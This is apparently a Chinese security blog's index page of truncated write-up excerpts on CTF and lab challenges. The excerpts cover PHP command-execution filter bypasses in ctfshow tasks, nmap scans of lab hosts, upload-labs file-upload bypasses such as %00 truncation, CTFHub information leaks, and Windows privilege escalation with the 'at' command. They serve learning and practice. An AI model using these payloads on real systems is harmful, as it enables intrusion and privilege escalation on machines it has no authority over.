摘要:
1.web74 还是先扫目录 payload: c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}exit(0); #扫描根目录有什么文件 c=$a=new DirectoryI 阅读全文
摘要:
1.信息搜集,扫描存活主机,扫描端口,服务,发现开放80,22端口,cms没有看到 nmap 192.168.85.0/24 nmap -p1-66535 192.168.85.175 nmap -sv 192.168.85.175 2.访问网站,发现登录框,根据提示,用户名可能是admin,随便找 阅读全文
摘要:
1.pass11 白名单 get%00绕过 可以看出上传路径可控,截断有两个前提条件,php版本小于5.3.4,php.ini的配置中magic_quotes_gpc 为off 上传的文件后缀为jpg,而img_path,文件保存的路径是…/upload/1.php%00/15555.jpg,因为使 阅读全文
摘要:
1.web64 payload: c=show_source('flag.php'); c=highlight_file('flag.php'); c=print_r(scandir(dirname(__FILE__)));#扫描当前目录有什么文件 c=$a=opendir('./');while( 阅读全文
摘要:
1.目录遍历 点击找flag,进入后发现是目录遍历 flag 2.phpinfo 点击查看,搜索ctfhub{ 3.备份下载 -1 网站源码 一个一个试,最后试出试www.zip,解压出三个文件,发现关键文件flag_197692240.txt 访问这个文件,得到flag -2 bak文件 下载in 阅读全文
摘要:
nmap进行主机扫描,发现存活主机192.168.85.169 nmap 192.168.85.0/24 2.nmap对主机192.168.85.169进行端口扫描和服务扫描,发现还开放了7744是ssh服务,这题估计会用到ssh nmap 192.168.85.169 -p1-65335 nmap 阅读全文
摘要:
1.pass-1 前端js检查,修改js或修改后缀绕过 查看源代码,可以发现是客户端的进行检查: 两种方法: (1).禁用js或修改js代码 (2).抓包修改后缀 这里采用抓包修改后缀 先改成可以上传的后缀名,在抓包修改后缀名为php 1.php代码 <?php phpinfo();?> 把包发送, 阅读全文
摘要:
windows web到system提权: windows 本地到system提权: 阅读全文
摘要:
1.web29 eval()函数是把所有字符串当作php代码去执行,这题过滤了flag,使用通配符绕过过滤应该要注意文件中没有重名的文件,或一部分是一样的文件 payload: c=echo%20`nl f''lag.php`; #官方解法,``反引号表示执行系统命令,nl为linux系统命令,是查 阅读全文
摘要:
0x01 AT&SC&PS命令提权 1.at命令提权 at是一个计划任务的命令,当调用计划任务是以system权限运行的,就实现提权 当取得普通用户可以登录时可以使用此方法提权,本地用户提权 win2003及以下版本试用 环境:win2003 at 16:40 /interactive cmd #在 阅读全文